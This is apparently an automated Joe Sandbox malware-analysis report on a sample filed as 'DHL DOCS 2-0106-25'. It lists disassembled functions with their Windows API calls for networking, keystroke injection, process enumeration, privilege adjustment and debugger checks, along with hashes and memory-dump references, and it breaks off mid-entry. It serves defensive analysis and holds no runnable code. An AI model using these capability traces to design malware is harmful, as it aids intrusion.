Opcode ID: e3f5efd7a35940ba1dd87aac3fd901b1e52e6c5051294504d3d3e256da3a7e9e
Instruction ID: f5974b8fb8d353c311c416045d1f7002ff0137703bbeea8d6124506e908df8d2
Opcode Fuzzy Hash: e3f5efd7a35940ba1dd87aac3fd901b1e52e6c5051294504d3d3e256da3a7e9e
Instruction Fuzzy Hash: 0E41A47191021AAFDF54DFA4D889AEE7BF4FF19310F20405AE805A3191EB309E94CF60

Function 001B8060 Relevance: 8.7, Strings: 6, Instructions: 1151COMMON

Download Yara Rule

Strings

VUUU, xrefs: 001B83E8
VUUU, xrefs: 001B843C
VUUU, xrefs: 001B83FA
VUUU, xrefs: 001F5DF0
6108eadbb521b84b53f064453b6d3bf2dfaa9eb9b97bb32aaaa089afceee8863c42717a00113dcea431e2105feb644a5af1ddb388d80dd5c6c6c89cd10b059b2c3, xrefs: 001F5D0F
ERCP, xrefs: 001B813C

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID:
String ID: 6108eadbb521b84b53f064453b6d3bf2dfaa9eb9b97bb32aaaa089afceee8863c42717a00113dcea431e2105feb644a5af1ddb388d80dd5c6c6c89cd10b059b2c3$ERCP$VUUU$VUUU$VUUU$VUUU
API String ID: 0-3938889968
Opcode ID: 8c7c70942d2f98e3d370ed97a257018e446f1e309440c05b0008a21b34b61ce9
Instruction ID: 09baceb2c2c0b1c34cdedb527188ccd4e16e580c345713468d0092c67b9519ca
Opcode Fuzzy Hash: 8c7c70942d2f98e3d370ed97a257018e446f1e309440c05b0008a21b34b61ce9
Instruction Fuzzy Hash: A6A27D70E0061ECBDF28CF58C8507FEB7B6BB54714F2581AAEA15A7285DB709D81CB90

Function 001C997D Relevance: 7.9, APIs: 5, Instructions: 375COMMON

Download Yara Rule

APIs

Part of subcall function 001C9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 001C9BB2

DefDlgProcW.USER32(?,?,?,?,?), ref: 001C9A4E
GetSysColor.USER32(0000000F), ref: 001C9B23
SetBkColor.GDI32(?,00000000), ref: 001C9B36

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: Color$LongProcWindow
String ID:
API String ID: 3131106179-0
Opcode ID: 19baf01232f164704ad1092872c8bd0b0eff977a7a86c16da51d7b15da9697ef
Instruction ID: dcd11fb39d9fbce638621cba8a33c5f67aab26fa8b6dd9c59e144e37bd0ce4f4
Opcode Fuzzy Hash: 19baf01232f164704ad1092872c8bd0b0eff977a7a86c16da51d7b15da9697ef
Instruction Fuzzy Hash: 17A13570629500BFE72CAE2C9C8DF7B2A9DEB62340B15010DF402D76E2CB25ED61D672

Function 00231806 Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0023304E: inet_addr.WSOCK32(?), ref: 0023307A
Part of subcall function 0023304E: _wcslen.LIBCMT ref: 0023309B

socket.WSOCK32(00000002,00000002,00000011), ref: 0023185D
WSAGetLastError.WSOCK32 ref: 00231884
bind.WSOCK32(00000000,?,00000010), ref: 002318DB
WSAGetLastError.WSOCK32 ref: 002318E6
closesocket.WSOCK32(00000000), ref: 00231915

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
String ID:
API String ID: 1601658205-0
Opcode ID: 7649c7292e3c247e4f1327a81f67d9a6f53a3bcd33a63a68f09b86d274b4a4ed
Instruction ID: a5df6ff6516caca3bacda3dc62fa8e87e3fd7679682af4b0591a11cfae5991d3
Opcode Fuzzy Hash: 7649c7292e3c247e4f1327a81f67d9a6f53a3bcd33a63a68f09b86d274b4a4ed
Instruction Fuzzy Hash: 7A51C575A002009FEB10AF24D88AF6A77E5AB59718F18809CF9059F3D3C771ED518BE1

Function 00241C41 Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 00241CC0
IsWindowEnabled.USER32 ref: 00241CCE
GetForegroundWindow.USER32(?,?,00000001,?), ref: 00241CDB
IsIconic.USER32 ref: 00241CE9
IsZoomed.USER32 ref: 00241CF7

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: cd0a7f1c0f60810cb41958df4f8c272572c983a43e688711c5f751de5f07e0a9
Instruction ID: 45aa22e59fdf40dd8032935009db4896b0769876ca212c332d3480095a477fed
Opcode Fuzzy Hash: cd0a7f1c0f60810cb41958df4f8c272572c983a43e688711c5f751de5f07e0a9
Instruction Fuzzy Hash: 332127317512119FD3288F1ADC84B6A7BE5EF85314F19805DE84ACB351CB71DCA2CB91

Function 00218298 Relevance: 6.6, APIs: 1, Strings: 3, Instructions: 568stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00000000), ref: 002182AA

Strings

(, xrefs: 002182F0
tb', xrefs: 002184F4
|, xrefs: 002182DA

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: lstrlen
String ID: ($tb'$|
API String ID: 1659193697-4112980726
Opcode ID: 1b66cdaf33e39327e4d55646e1a14ce093cccf25c3b4e40ba2131452e86da51b
Instruction ID: 351488d97634c6d93bcb82a6051e74061860405ade06911759462cfe93323214
Opcode Fuzzy Hash: 1b66cdaf33e39327e4d55646e1a14ce093cccf25c3b4e40ba2131452e86da51b
Instruction Fuzzy Hash: 9E323875A107069FC728CF59C080AAAB7F0FF58710B15C56EE59ADB3A1EB70E991CB40

Function 0023A67C Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 0023A6AC
Process32FirstW.KERNEL32(00000000,?), ref: 0023A6BA

Part of subcall function 001B9CB3: _wcslen.LIBCMT ref: 001B9CBD

Process32NextW.KERNEL32(00000000,?), ref: 0023A79C
CloseHandle.KERNEL32(00000000), ref: 0023A7AB

Part of subcall function 001CCE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,001F3303,?), ref: 001CCE8A

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
String ID:
API String ID: 1991900642-0
Opcode ID: f49099fa7fa85698d36724708a4cfdc7e491a52842bfd5ed9c5f06bc5b0f187c
Instruction ID: f58b2de340b2a29522fc98e38d6902b81d41aaebc5c4a9290069ba707b9405a9
Opcode Fuzzy Hash: f49099fa7fa85698d36724708a4cfdc7e491a52842bfd5ed9c5f06bc5b0f187c
Instruction Fuzzy Hash: E8512CB1508301AFD710EF24D886E6BBBE8FF99754F40492DF58997251EB30D905CB92

Function 0021AA57 Relevance: 6.1, APIs: 4, Instructions: 107keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 0021AAAC
SetKeyboardState.USER32(00000080), ref: 0021AAC8
PostMessageW.USER32(?,00000102,00000001,00000001), ref: 0021AB36
SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 0021AB88

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 91f3ab81d3c73ceb116f396f5e17b4fefedeb9f4bf3306179dd6278b6ed0f5bb
Instruction ID: 1d2ed20b7a9a563558d2a9333f75be1e7e5be0558529f021b936942392727e77
Opcode Fuzzy Hash: 91f3ab81d3c73ceb116f396f5e17b4fefedeb9f4bf3306179dd6278b6ed0f5bb
Instruction Fuzzy Hash: AB314A70A66288AEFB34CF68CC05BFA77E6AF74314F04421AF081521D0C3748AE0C752

Function 001EBB6F Relevance: 6.1, APIs: 4, Instructions: 90timeCOMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 001EBB7F

Part of subcall function 001E29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,001ED7D1,00000000,00000000,00000000,00000000,?,001ED7F8,00000000,00000007,00000000,?,001EDBF5,00000000), ref: 001E29DE
Part of subcall function 001E29C8: GetLastError.KERNEL32(00000000,?,001ED7D1,00000000,00000000,00000000,00000000,?,001ED7F8,00000000,00000007,00000000,?,001EDBF5,00000000,00000000), ref: 001E29F0

GetTimeZoneInformation.KERNEL32 ref: 001EBB91
WideCharToMultiByte.KERNEL32(00000000,?,0028121C,000000FF,?,0000003F,?,?), ref: 001EBC09
WideCharToMultiByte.KERNEL32(00000000,?,00281270,000000FF,?,0000003F,?,?,?,0028121C,000000FF,?,0000003F,?,?), ref: 001EBC36

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone_free
String ID:
API String ID: 806657224-0
Opcode ID: 3c950f6dba1890a28ae208ff930be51f083e24db6ecf0243f4634b56adaacc83
Instruction ID: 059e8edceb47a609e5054561f26e5a6919629ce286c84294c384b985e7ea6988
Opcode Fuzzy Hash: 3c950f6dba1890a28ae208ff930be51f083e24db6ecf0243f4634b56adaacc83
Instruction Fuzzy Hash: 9331F034909695DFCB14DF6AEC8182EBBB8FF56310B2442AAE454D72E5C7309D12CB50

Function 0022CE44 Relevance: 6.1, APIs: 4, Instructions: 75filenetworkCOMMON

Download Yara Rule

APIs

InternetReadFile.WININET(?,?,00000400,?), ref: 0022CE89
GetLastError.KERNEL32(?,00000000), ref: 0022CEEA
SetEvent.KERNEL32(?,?,00000000), ref: 0022CEFE

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: ErrorEventFileInternetLastRead
String ID:
API String ID: 234945975-0
Opcode ID: c279f21a1ee1ceb7be05bfe1263260646c528f4c8b7c9723c8baa14f293a2578
Instruction ID: 4fa49742fdde9cb805a679c560843cfa409d072e27e896440d4e65bc99d813c7
Opcode Fuzzy Hash: c279f21a1ee1ceb7be05bfe1263260646c528f4c8b7c9723c8baa14f293a2578
Instruction Fuzzy Hash: 2521CFB1510716ABDB30DFA5E948BABB7FCEB50358F20442EE646D2151E7B0EE148B50

Function 0021DBBE Relevance: 6.0, APIs: 4, Instructions: 29filestringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,001F5222), ref: 0021DBCE
GetFileAttributesW.KERNEL32(?), ref: 0021DBDD
FindFirstFileW.KERNEL32(?,?), ref: 0021DBEE
FindClose.KERNEL32(00000000), ref: 0021DBFA

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: FileFind$AttributesCloseFirstlstrlen
String ID:
API String ID: 2695905019-0
Opcode ID: 29f31cf3e1b9d06e31ec8c0f9c1806b2971d8c4c5d96ac830b1aa038fa7b1687
Instruction ID: 576fcd58ebdb33d531190b5be4f34183334bed27a4c9dc3e412c079cfd87220e
Opcode Fuzzy Hash: 29f31cf3e1b9d06e31ec8c0f9c1806b2971d8c4c5d96ac830b1aa038fa7b1687
Instruction Fuzzy Hash: 3BF0EC34421910978220AF7CBC0D4EA37AC9E02334B604B03F935C10F0EBF05DA4C9D5

Function 00225C97 Relevance: 4.6, APIs: 3, Instructions: 138fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00225CC1
FindNextFileW.KERNEL32(00000000,?), ref: 00225D17
FindClose.KERNEL32(?), ref: 00225D5F

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: Find$File$CloseFirstNext
String ID:
API String ID: 3541575487-0
Opcode ID: e216deac0efa5b8950f11ddb4f0bacc85757a891f8896c4d41f01111b9e9b719
Instruction ID: e8ae8c8d58b8fb9a2de0c4f212bb3ded0fd344f121cbd81d90d2653beb0960b4
Opcode Fuzzy Hash: e216deac0efa5b8950f11ddb4f0bacc85757a891f8896c4d41f01111b9e9b719
Instruction Fuzzy Hash: C651BB34614A12AFC714CF68D494E96B7E4FF4A324F14855EE95A8B3A2CB30EC14CF91

Function 001E2622 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 001E271A
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 001E2724
UnhandledExceptionFilter.KERNEL32(?), ref: 001E2731

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: a03fddfff26114edcc4d5bdb7c1f57171dc90e6ddb0b5b033767a4ea1b015f6c
Instruction ID: 58cd569543e9ab63bce33bce004535f03a3e20d59307c75754f268f16edabda2
Opcode Fuzzy Hash: a03fddfff26114edcc4d5bdb7c1f57171dc90e6ddb0b5b033767a4ea1b015f6c
Instruction Fuzzy Hash: 0F31B374911228ABCB21DF69DC8979DBBB8BF18310F5041EAE81CA7261E7749F818F45

Function 002251CD Relevance: 4.6, APIs: 3, Instructions: 76COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 002251DA
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00225238
SetErrorMode.KERNEL32(00000000), ref: 002252A1

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: 0caa81f49abd25755f9e39a637a66f371da75a3f9d00ba4d9c9c89c01c4bc1d6
Instruction ID: f72ea4e0baf9daa0ce30afde7d6540c3b5c3f36c5049c851e0664bed8bd4eaec
Opcode Fuzzy Hash: 0caa81f49abd25755f9e39a637a66f371da75a3f9d00ba4d9c9c89c01c4bc1d6
Instruction Fuzzy Hash: 7D312F75A10519EFDB00DF94D888EEDBBB4FF49314F148099E8099B392DB71E856CBA0

Function 002116C3 Relevance: 4.6, APIs: 3, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 001CFDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 001D0668
Part of subcall function 001CFDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 001D0685

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0021170D
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0021173A
GetLastError.KERNEL32 ref: 0021174A

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
String ID:
API String ID: 577356006-0
Opcode ID: 439050143c6a1cba45b4657aba3dd65a86274bb9736afd81dd553148dc09b817
Instruction ID: b610f38c28499da9f90d827aac9518053b9403a40d09e3fe298d994c95d96b53
Opcode Fuzzy Hash: 439050143c6a1cba45b4657aba3dd65a86274bb9736afd81dd553148dc09b817
Instruction Fuzzy Hash: 5511C1B2414305AFD7189F54EC86EABB7FDEB54714B20852EE05653291EB70FC928A20

Function 0021D5EB Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0021D608
DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 0021D645
CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0021D650

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle
String ID:
API String ID: 33631002-0
Opcode ID: 582c25aba8139d6ab5dc11c11984f5a218812c55211cf039f6b6386d326e4c93
Instruction ID: 536efb826dd5e2dff44c7602a8caf828775772f714a3ed5a695a244f849a8c3e
Opcode Fuzzy Hash: 582c25aba8139d6ab5dc11c11984f5a218812c55211cf039f6b6386d326e4c93
Instruction Fuzzy Hash: 0C113075E05228BBDB108F99AC49FAFBBBCEB45B50F104155F904E7290D6B05A058BA1

Function 00211663 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0021168C
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 002116A1
FreeSid.ADVAPI32(?), ref: 002116B1

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: 08e929c93937b55cee5d5b6f67d9eadab62ea3ea3d9ab9b0417f56f24ec050ed
Instruction ID: 52c585199c1a872c4445733fc6493a9e08c05d9455173b3d3597002a9e138317
Opcode Fuzzy Hash: 08e929c93937b55cee5d5b6f67d9eadab62ea3ea3d9ab9b0417f56f24ec050ed
Instruction Fuzzy Hash: 37F0F475A51309FBDB00DFE49C89AAEBBBCEB08605F504965E501E2181E774AA448A54

Function 001D4CE8 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(001E28E9,?,001D4CBE,001E28E9,002788B8,0000000C,001D4E15,001E28E9,00000002,00000000,?,001E28E9), ref: 001D4D09
TerminateProcess.KERNEL32(00000000,?,001D4CBE,001E28E9,002788B8,0000000C,001D4E15,001E28E9,00000002,00000000,?,001E28E9), ref: 001D4D10
ExitProcess.KERNEL32 ref: 001D4D22

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: c36f2d6b120b38d213d1acafba6f184d8fe4ece84404f894007e6d031bef2f28
Instruction ID: 0d783a1920e577d43d6469f19afd5774ac9244bd93095aa0e77d204f736b8e28
Opcode Fuzzy Hash: c36f2d6b120b38d213d1acafba6f184d8fe4ece84404f894007e6d031bef2f28
